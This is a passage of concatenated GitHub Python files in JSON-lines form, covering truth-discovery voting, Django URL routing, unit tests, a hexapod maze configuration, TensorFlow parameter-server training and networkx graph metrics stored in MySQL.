object_claim_count_dict[key2][key1] += 1\n return object_claim_count_dict\n\n def generate_truth_dict(objectClaimDict):\n truth_dict = dict()\n for key1 in objectClaimDict.keys():\n if key1 not in truth_dict.keys():\n truth_dict[key1] = list()\n max_value = 0\n for key2 in objectClaimDict[key1].keys():\n if objectClaimDict[key1][key2] > max_value:\n max_value = objectClaimDict[key1][key2]\n for key2 in objectClaimDict[key1].keys():\n if objectClaimDict[key1][key2] == max_value:\n truth_dict[key1].append(key2)\n return truth_dict\n\n def write_truth_dict(factDict, truthDict):\n dataWriteList = list()\n for key1 in truthDict.keys():\n dataWriteLine = key1 + \"\\t\"\n for key2 in truthDict[key1]:\n dataWriteLine = dataWriteLine + factDict[key2][key1] + \";\"\n dataWriteLine = dataWriteLine.strip(\";\") + \"\\n\"\n dataWriteList.append(dataWriteLine)\n return dataWriteList\n\n factDict = dict()\n claimDict = dict()\n\n global folder_write\n if dataset == 1: # movie\n folder_write = \"movie\"\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"factDB_movie\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"claimDB_movie\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n elif dataset == 0:\n folder_write = \"book\"\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"factDB_book\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"claimDB_book\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n elif dataset == -1: # this is for testing\n folder_write = \"test\"\n dataFile = open(file=test_fact_path, mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=test_claim_path, mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n start = time.time()\n objectClaimDict = generate_object_claim_dict(factDict, claimDict)\n truthDict = generate_truth_dict(objectClaimDict)\n dataWriteList = write_truth_dict(factDict, truthDict)\n used_time = time.time() - start\n result_write = open(file=outputWritePath + \"/\" + folder_write + \"/\" + \"truth_result_MV_\" + folder_write, mode=\"w\", encoding=\"utf-8\")\n result_write.write(\"OID\\tInferTruth\\n\")\n result_write.writelines(dataWriteList)\n result_write.close()\n\n result_write = open(file=\"./\" + \"journal_\" + folder_write, mode=\"a+\", encoding=\"utf-8\")\n result_write.write(\"Experiment on \" + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M') + \"\\n\")\n result_write.write(\"Total Time : \" + str(used_time) + \"\\n\")\n result_write.close()\n\n\"\"\"\nMV(1, \"../DataToUse/movie\", \"./\")\nMV(0, \"../DataToUse/book\", \"./\")\n\"\"\"","repo_name":"yishangru/TruthDiscovery","sub_path":"MajorityVote/MV.py","file_name":"MV.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"37844373174","text":"import datetime\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom tabledef import *\nimport pandas as pd\nimport sys\n\nengine = create_engine('sqlite:///tutorial.db', echo=True)\n\n# create a Session\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# user = User(\"admin\",\"password\")\n# session.add(user)\n\npd.options.display.max_rows = 999\n\ndf = pd.read_excel('masters-final.xlsx')\nprint(len(df))\n\nfor i in range(len(df)):\n r=df['REG.NO'][i]\n d=df['Date of Birth'].dt.date[i]\n r=str(r)\n d=str(d)\n user = User(r,d)\n session.add(user)\n session.commit()\n print(r,\"\\n\",d)\n\n#user = User(\"python\",\"python\")\n#session.add(user)\n\nuser = User(\"umesh\",\"umesh\")\nsession.add(user)\n\n# commit the record the database\nsession.commit()\n\nsession.commit()\n","repo_name":"umeshkumarS/masters-python","sub_path":"dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33620804244","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport posixpath\nimport json\nimport time\nimport os\nimport config\n\nfrom location import DLLocation\nfrom collections import defaultdict\n\n\nroot_file_path = posixpath.join(os.path.dirname(__file__), 'config')\n\nclass digital_lync_chart:\n def __init__(self, location=''):\n if location:\n self.loc = location\n else:\n self.loc = DLLocation().location\n self.list_of_courses = config.DigitalLoc().courses\n self.student_cofig_path = posixpath.join(root_file_path, 'students', '{}.json'.format(self.loc))\n if os.path.exists(self.student_cofig_path):\n student_fp = open(self.student_cofig_path, 'r')\n self.student_stat_dict = json.load(student_fp)\n student_fp.close()\n else:\n self.student_stat_dict = {}\n self.mentor_config_path = posixpath.join(root_file_path, '/mentors', self.loc + '.json')\n if os.path.exists(self.mentor_config_path):\n mentor_fp = open(self.mentor_config_path, 'r')\n self.mentor_stat_dict = json.load(mentor_fp)\n mentor_fp.close()\n else:\n self.mentor_stat_dict = {}\n self.fig, self.ax = plt.subplots()\n\n\n def get_total_student_count(self):\n return len(self.student_stat_dict)\n\n def get_total_mentor_count(self):\n return len(self.mentor_stat_dict)\n\n def get_student_course_count(self):\n student_course_count_dict = {}\n for course_item in self.list_of_courses:\n student_course_count_dict[course_item] = 0\n if not self.student_stat_dict:\n continue\n for student_item in self.student_stat_dict:\n if course_item.lower() in self.student_stat_dict[student_item]['__courses_opted']:\n student_course_count_dict[course_item] += 1\n else:\n continue\n return student_course_count_dict\n\n def plot_student_chart(self):\n print(\"Plotting Student chart...\")\n course_label = []\n course_size = []\n for item, count in self.get_student_course_count().items():\n course_label.append(item)\n course_size.append(count)\n plt.rc('font', size=8)\n self.fig.set_size_inches(12.0, 5.0)\n y_pos = np.arange(len(course_label))\n self.ax.barh(y_pos, course_size, align='center', alpha=0.5, color='green')\n self.ax.set_yticks(y_pos)\n self.ax.set_yticklabels(course_label)\n self.ax.set_ylabel('Courses')\n self.ax.invert_yaxis()\n self.ax.set_xlabel('Number Of Students (Total: {})'.format(str(self.get_total_student_count())))\n self.ax.set_title('Digital Lync Student')\n plt.savefig('./assets/stat_data/student_count_bar.png')\n time.sleep(2)\n # plt.show()\n\n def plot_mentor_chart(self):\n pass\n\n\nif __name__ == \"__main__\":\n inst = digital_lync_chart()\n inst.plot_student_chart()\n","repo_name":"devottam2485/diglyn","sub_path":"DLStatData.py","file_name":"DLStatData.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38031339093","text":"import numpy as np\nimport os\ndef getDirectedSpanningTree(edgeList,N,fname,resultFile,mstwrapperloc='./'):\n\t#Append to beginning of file\n\tf = open(fname,'w')\n\tf.write(str(N)+\"\\n\")\n\tnp.savetxt(f,edgeList,delimiter=',',fmt=['%d','%d','%d'])\n\tf.close()\t\n\tos.system(mstwrapperloc+'mstwrapper '+fname+' '+resultFile)\nif __name__ == '__main__':\n\tt = np.zeros((3,3))\n\tt[0,:]=np.array([1,2,12])\n\tt[1,:]=np.array([2,3,321])\n\tt[2,:]=np.array([3,1,5])\n\tgetDirectedSpanningTree(t,3,'smallTest.txt','smallResult.txt')\n","repo_name":"rahulk90/dir_mst_wrapper","sub_path":"directedMST.py","file_name":"directedMST.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12613628463","text":"\"\"\"\nURLs for the credit app.\n\"\"\"\n\n\nfrom django.urls import include, path, re_path\n\nfrom openedx.core.djangoapps.credit import models, routers, views\n\nPROVIDER_ID_PATTERN = fr'(?P{models.CREDIT_PROVIDER_ID_REGEX})'\n\nPROVIDER_URLS = [\n path('request/', views.CreditProviderRequestCreateView.as_view(), name='create_request'),\n re_path(r'^callback/?$', views.CreditProviderCallbackView.as_view(), name='provider_callback'),\n]\n\nV1_URLS = [\n re_path(fr'^providers/{PROVIDER_ID_PATTERN}/', include(PROVIDER_URLS)),\n path('eligibility/', views.CreditEligibilityView.as_view(), name='eligibility_details'),\n]\n\nrouter = routers.SimpleRouter() # pylint: disable=invalid-name\nrouter.register(r'courses', views.CreditCourseViewSet)\nrouter.register(r'providers', views.CreditProviderViewSet)\nV1_URLS += router.urls\n\napp_name = 'credit'\nurlpatterns = [\n path('v1/', include(V1_URLS)),\n]\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/credit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"29258218737","text":"import maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.mvrp_checker as mvrp_checker\nimport maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.tools as tools\nimport json\n\n\ndef test_custom_cost():\n request = tools.get_test_json(\"custom_cost.json\")\n response1 = mvrp_checker.solve_and_check(\n json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n request[\"vehicles\"][0][\"cost\"] = (\n \"(150 * duration_h + 10 * distance_km + 100 * locations + 3000) + \"\n \"(120 * trailer_duration_h + 12 * trailer_distance_km + 2000 * trailer_used)\"\n )\n response2 = mvrp_checker.solve_and_check(\n json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n for key in response1[\"metrics\"]:\n if key not in [\n \"operations_per_second\",\n \"total_duration_cost\",\n \"total_fixed_cost\",\n \"total_locations_cost\",\n \"total_runs_cost\",\n \"total_transit_distance_cost\",\n \"total_custom_cost\",\n ]:\n assert tools.is_abs_close(response1[\"metrics\"][key], response2[\"metrics\"][key], 1e-6)\n\n\ndef test_payout():\n # Решаем задачу, в которой по формулам выплата и стоимость отличаются ровно на 10000\n request = tools.get_test_json(\"custom_cost.json\")\n\n cost_string = (\n \"(150 * duration_h + 10 * distance_km + 100 * locations + 3000) + \"\n \"(120 * trailer_duration_h + 12 * trailer_distance_km + 2000 * trailer_used)\"\n )\n payout_string = cost_string + \" + 10000\"\n\n request[\"vehicles\"][0][\"cost\"] = cost_string\n request[\"vehicles\"][0][\"payout\"] = payout_string\n\n response = mvrp_checker.solve_and_check(\n json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n assert tools.is_abs_close(response[\"metrics\"][\"total_custom_cost\"] + 10000, response[\"metrics\"][\"total_payout\"], 1e-6)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests_fast/test_custom_cost.py","file_name":"test_custom_cost.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5045375408","text":"from django.urls import path\nfrom .views import ItemsListView, FilterPhoneItemView, FilterNotebookItemView, main_index\n\nurlpatterns = [\n path('', main_index, name='index'),\n # path('', StartPageView.as_view(), name='index'),\n path('items/', ItemsListView.as_view(), name='items-list'),\n path('items/phone', FilterPhoneItemView.as_view(), name='phone-list'),\n path('items/notebook', FilterNotebookItemView.as_view(), name='notebook-list'),\n\n]\n","repo_name":"semen-ksv/test_scraping_site_django_api","sub_path":"citrys_scraping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25812979800","text":"import unittest\nfrom ReplicatorReceiver.Logger import Logger\nfrom unittest.mock import patch, mock_open\nfrom assets.helper import CODE\nfrom datetime import datetime\n\n\nclass TestFileWriter(unittest.TestCase):\n\n def test_file_writer(self):\n fake_file_path = \"fake/file/path\"\n content = \"sdadasdada\"\n with patch('ReplicatorReceiver.Logger.open', mock_open()) as mocked_file:\n Logger(\"milos\").write_in_file(fake_file_path, content)\n\n # assert if opened file on write mode 'w'\n mocked_file.assert_called_once_with(fake_file_path, 'a')\n\n # assert if write(content) was called from the file opened\n # in another words, assert if the specific content was written in file\n mocked_file().write.assert_called_once_with(content)\n\n def test_logg_send_codes(self):\n test_code = CODE(CODE.CODE_ANALOG)\n test_value = 1111\n test_value1 = -1111\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n test_writerid = 111\n test_writerid1 = -111\n\n self.assertEqual(None, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value, test_datetime, test_writerid))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value1, test_datetime, test_writerid))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value, test_datetime, test_writerid1))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value1, test_datetime, test_writerid1))\n\n def test_logg_stored_codes(self):\n test_code = CODE(CODE.CODE_ANALOG)\n test_value = 1111\n test_value1 = -1111\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n\n self.assertEqual(None, Logger.LoggStoredCodes(Logger(\"TestiranjeLOGGER\\\\test2\"), test_code, test_value, test_datetime))\n\n self.assertRaises(Exception, Logger.LoggStoredCodes(Logger(\"TestiranjeLOGGER\\\\test2\"), test_code, test_value1, test_datetime))\n\n def test_logg_activity(self):\n test_activity = \"sasdasa\"\n test_activity1 = \"\"\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n\n self.assertEqual(None, Logger.LoggActivity(Logger(\"TestiranjeLOGGER\\\\test3\"), test_activity, test_datetime))\n\n self.assertRaises(Exception, Logger.LoggActivity(Logger(\"TestiranjeLOGGER\\\\test3\"), test_activity1, test_datetime))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Pantex9/RES-projekat-tim13","sub_path":"ReplicatorReceiver/testiranje/TestiranjeLOGGER/testiranjeLogger.py","file_name":"testiranjeLogger.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74153147282","text":"import numpy as np\nimport math\n'''\nDescription: A Dictionary of all the Regions in the Maze with their region Area, HexaPod tilt in the X,Y direct,PID Values, and Specified target\nNote: Ramp is divided into two parts since its angle lies between 0-4 degrees and 356-360 degrees\n'''\nOrigin_X=53 #Origin of the X Axis which is located in th center of the Maze\nOrigin_Y=46 #Origin of the Y Axis which is located in th center of the Maze\n\nconvert=math.pi/180 # Conversion from degrees to radians\n#PID Values for the two regions around the target region of the first ring\nP_1=.01\nI_1=0.09\nD_1=1.05\n#PID Values for the two regions farthest from the first ring target\nP_out=.0008\nI_out=0.1\nD_out=0.05\n#PID Values for the 2nd ring\nP_2=0.01\nI_2=0.07\nD_2=.9\n#PID Values for the 3rd ring\nP_3=0.009\nI_3=0.07\nD_3=.95\n#PID Values for the 4th ring\nP_4=0.01\nI_4=0.1\nD_4=.95\n#Note: The entrance regions and ramps have targets and PIDS but are not used because in the code, those special Regions just go straight to their target position jsut to knock the ball in quickly\nRegion = {\n \"Ring1_1\" :{\"Area\":[38,47,82,97],#[Inner Diameter, Outer Diameter, Min Angle, Max Angle]\n \"X_pos\":-1,#Hexapod X tilt\n \"Y_pos\":-5,#Hexapod Y tilt\n \"P Gain\":0.01,#P Value in PID\n \"I Gain\":0.00,# I Value in PID\n \"D Gain\":0.00,# D Value in PID\n \"Target\":[int(30*math.cos(-89*convert)+Origin_X),int(30*math.sin(-89*convert)+Origin_Y)]},# Taget position of the ball\n #Note:Each ring has the same target except for the entrance regions (which as stated above aren't used)\n \"Ring1_2\" :{\"Area\":[40,47,94,195],\"X_pos\":.5,\n \"Y_pos\":4,\n \"P Gain\":P_1,\n \"I Gain\":I_1,\n \"D Gain\":D_1,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_3\" :{\"Area\":[40,47,193,270],\"X_pos\":-5,\n \"Y_pos\":2,\n \"P Gain\":P_out,\n \"I Gain\":I_out,\n \"D Gain\":D_out,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_5\" :{\"Area\":[41,47,0,84],\"X_pos\":-.5,\n \"Y_pos\":4,\n \"P Gain\":P_1,\n \"I Gain\":I_1,\n \"D Gain\":D_1,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_4\" :{\"Area\":[40,47,270,360],\"X_pos\":4,\n \"Y_pos\":2,\n \"P Gain\":P_out,\n \"I Gain\":I_out,\n \"D Gain\":D_out,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ramp0_1\" :{\"Area\":[10,40,0,4],\"X_pos\":14,\n \"Y_pos\":1,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D Gain\":0.0,\n \"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \"Ramp0_2\" :{\"Area\":[10,40,356,360],\"X_pos\":14,\n \"Y_pos\":1,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D Gain\":0.00,\n \"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \"Ring2_1\" :{\"Area\":[30,38,6,80],\"X_pos\":-4,\n \"Y_pos\":1,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_3\" :{\"Area\":[29,39,167,190],\"X_pos\":5,\n \"Y_pos\":-1.5,\n \"P Gain\":.1,\n \"I Gain\":0.1,\n \"D Gain\":0,\n \"Target\":[int(22*math.cos(-178*convert)+Origin_X),int(22*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_2\" :{\"Area\":[30,39,80,169],\"X_pos\":-5,\n \"Y_pos\":-.2,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_4\" :{\"Area\":[31,39,189,300],\"X_pos\":-5,\n \"Y_pos\":.2,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_5\" :{\"Area\":[31,39,300,353],\"X_pos\":-5,\n \"Y_pos\":-3,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring3_4\" :{\"Area\":[21,29,259,288],\"X_pos\":-1.5,\n \"Y_pos\":5,\n \"P Gain\":.2,\n \"I Gain\":0.1,\n \"D Gain\":0,\n \"Target\":[int(12*math.cos(-273*convert)+Origin_X),int(12*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_3\" :{\"Area\":[21,29,166,260],\"X_pos\":.1,\n \"Y_pos\":-5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_2\" :{\"Area\":[21,29,80,166],\"X_pos\":-5,\n \"Y_pos\":-.5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_1\" :{\"Area\":[21,29,6,80],\"X_pos\":-1,\n \"Y_pos\":5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_5\" :{\"Area\":[21,29,288,349],\"X_pos\":-.1,\n \"Y_pos\":-5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring4_4\" :{\"Area\":[12,20,70,110],\"X_pos\":0,\n \"Y_pos\":-10,\n \"P Gain\":.3,\n \"I Gain\":0.2,\n \"D Gain\":0,\n \"Target\":[int(0*math.cos(-90*convert)+Origin_X),int(0*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_3\" :{\"Area\":[14,20,110,200],\"X_pos\":1,\n \"Y_pos\":5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_2\" :{\"Area\":[14,21,200,294],\"X_pos\":-5,\n \"Y_pos\":1,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_1\" :{\"Area\":[14,21,294,348],\"X_pos\":-5,\n \"Y_pos\":-.5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_5\" :{\"Area\":[13,20,18,70],\"X_pos\":-1,\n \"Y_pos\":5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring5_1\" :{\"Area\":[0,12,0,360],\"X_pos\":14,\n \"Y_pos\":0,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D Gain\":0,\n \"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \n}\n","repo_name":"EliasNavarro/Hexy","sub_path":"Region_Dictionary.py","file_name":"Region_Dictionary.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34690824370","text":"list=[1,2,3,4,5,6,7,8,9,10]\nlist.reverse()\ni=0\na=1\nn=[]\nwhile i `float32`.\"\"\"\n return (tf.cast(image, tf.float32) / 255., label)\n\n # def dataset_fn():\n # return ds_train.map(normalize_img, num_parallel_calls=tf.data.AUTOTUNE).batch(global_batch_size).prefetch(tf.data.AUTOTUNE)\n\n # input = tf.keras.utils.experimental.DatasetCreator(dataset_fn=dataset_fn)\n\n ds_train = ds_train.map(normalize_img, num_parallel_calls=tf.data.AUTOTUNE).shuffle(20).repeat()\n ds_train = ds_train.batch(global_batch_size)\n ds_train = ds_train.prefetch(tf.data.AUTOTUNE)\n\n options = tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n\n ds_train = ds_train.with_options(options)\n\n # model = tf.keras.models.Sequential([\n # tf.keras.layers.Flatten(input_shape=(28, 28)),\n # tf.keras.layers.Dense(64, activation='relu'),\n # tf.keras.layers.Dense(128, activation='relu'),\n # tf.keras.layers.Dense(62)\n # ])\n\n # model.compile(\n # optimizer=tf.keras.optimizers.Adam(0.0001),\n # loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n # metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],\n # )\n\n\n variable_partitioner = (\n tf.distribute.experimental.partitioners.MinSizePartitioner(\n min_shard_bytes=(256 << 10),\n max_shards=2))\n\n strategy = tf.distribute.ParameterServerStrategy(\n cluster_resolver=tf.distribute.cluster_resolver.TFConfigClusterResolver(),\n variable_partitioner=variable_partitioner\n )\n\n with strategy.scope():\n model = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(62)\n ])\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(0.0001),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],\n )\n\n\n\n model.fit(\n ds_train,\n epochs=10,\n steps_per_epoch=100\n #validation_data=ds_test,\n )\n\n\n\nif tf_config[\"task\"][\"type\"] == \"ps\":\n print(\"3\")\n server()\nelif tf_config[\"task\"][\"type\"] == \"worker\" and tf_config[\"task\"][\"index\"] != 0:\n print(\"4\")\n controller()\n\nif tf_config[\"task\"][\"type\"] == \"worker\" and tf_config[\"task\"][\"index\"] == 0:\n controller()","repo_name":"ilmal/GA","sub_path":"mnist_ps/mnist_ps.py","file_name":"mnist_ps.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35854120343","text":"import json\r\nimport time\r\nimport random\r\nimport networkx as nx\r\nfrom networkx.readwrite import json_graph\r\nimport pymysql\r\nfrom flask import jsonify,request\r\n\r\ndef avggene(gene):\r\n \r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n cur.execute('select * from jsondata where generation=%d' %gene)\r\n mydata = cur.fetchall()\r\n mydata = mydata[0][1]\r\n mydata = json.loads(mydata)\r\n G = json_graph.node_link_graph(mydata)\r\n\r\n avg_degree=calavgdegree(G)\r\n avg_path=calavgpath(G)\r\n avg_cluster=calavgcluster(G)\r\n histogramtostr=calhistogram(G)\r\n\r\n tsql = \"insert into graphcaldata(avgdegree,avgpath,avgcluster,generation) values(%f,%f,%f,%d)\" %(avg_degree,avg_path,avg_cluster,gene)\r\n cur.execute(tsql)\r\n \r\n tsql2 = \"update graphcaldata set histogram='\"+histogramtostr+\"' where generation=%d\" %(gene)\r\n cur.execute(tsql2)\r\n conn.commit()\r\n\r\n\r\ndef calhistogram(G):\r\n degree_list=list(nx.degree_histogram(G))\r\n histogramtostr= str(degree_list)\r\n #print(histogramtostr)\r\n return histogramtostr\r\n\r\n\r\n\r\ndef calavgdegree(G):\r\n \r\n degree_list=list(nx.degree_histogram(G))\r\n #print(degree_list)\r\n avg_degree=0\r\n for i in range(len(degree_list)):\r\n avg_degree += i*(degree_list[i])\r\n avg_degree=avg_degree / G.number_of_nodes()\r\n return avg_degree\r\n\r\n\r\ndef calavgpath(G):\r\n degree_list=list(nx.degree_histogram(G))\r\n if (degree_list[0]==0):\r\n try:\r\n avg_path=nx.average_shortest_path_length(G)\r\n except:\r\n print('bug')\r\n avg_path= 999\r\n else:\r\n avg_path= 999\r\n return avg_path\r\n\r\n\r\ndef calavgcluster(G): \r\n avg_cluster=nx.average_clustering(G)\r\n return avg_cluster\r\n\r\n\r\n\r\ndef last_json(last_jsondata,last_graphdata,last_nodedata):\r\n\r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n \r\n # cur.execute('select * from jsondata order by id desc limit 1')\r\n # data1 = cur.fetchall()\r\n # maxgen = data1[0][2]\r\n # lastdata = data1[0][1]\r\n #maxgen =last_jsondata[0][2]\r\n lastdata =last_jsondata[0][1]\r\n\r\n lastdata = '{\"series\":[{\"type\":\"graph\",\"layout\":\"force\",\"roam\":true,\"force\":{\"repulsion\":200},\"draggable\":true,'+lastdata[1:]\r\n lastdata = lastdata+']}'\r\n \r\n #cur.execute('select * from graphcaldata order by generation desc limit 1')\r\n #graphdata = cur.fetchall()\r\n graphdata=last_graphdata\r\n\r\n last_avgdegree= graphdata[0][0]\r\n last_avgpath= graphdata[0][1]\r\n last_avgcluster= graphdata[0][2]\r\n last_histogram= graphdata[0][4]\r\n last_strtojson=json.loads(lastdata)\r\n\r\n\r\n #cur.execute('select * from nodedata where generation=%d'%(maxgen))\r\n #nodedata = cur.fetchall()\r\n nodedata = last_nodedata\r\n id_num=len(nodedata)\r\n for i in range(id_num):\r\n fuck1={}\r\n fuck2={}\r\n fuck1['formatter']='id: %d\\n------------------------\\ndegreee: %d\\nbetweeness: %f\\ncloseness: %f\\neigenvector: %f\\nkatz: %f\\ncluster: %f\\ntriangle: %d'%(nodedata[i][1],nodedata[i][2],nodedata[i][3],nodedata[i][4],nodedata[i][5],nodedata[i][6],nodedata[i][7],nodedata[i][8])\r\n fuck1['align']='left'\r\n 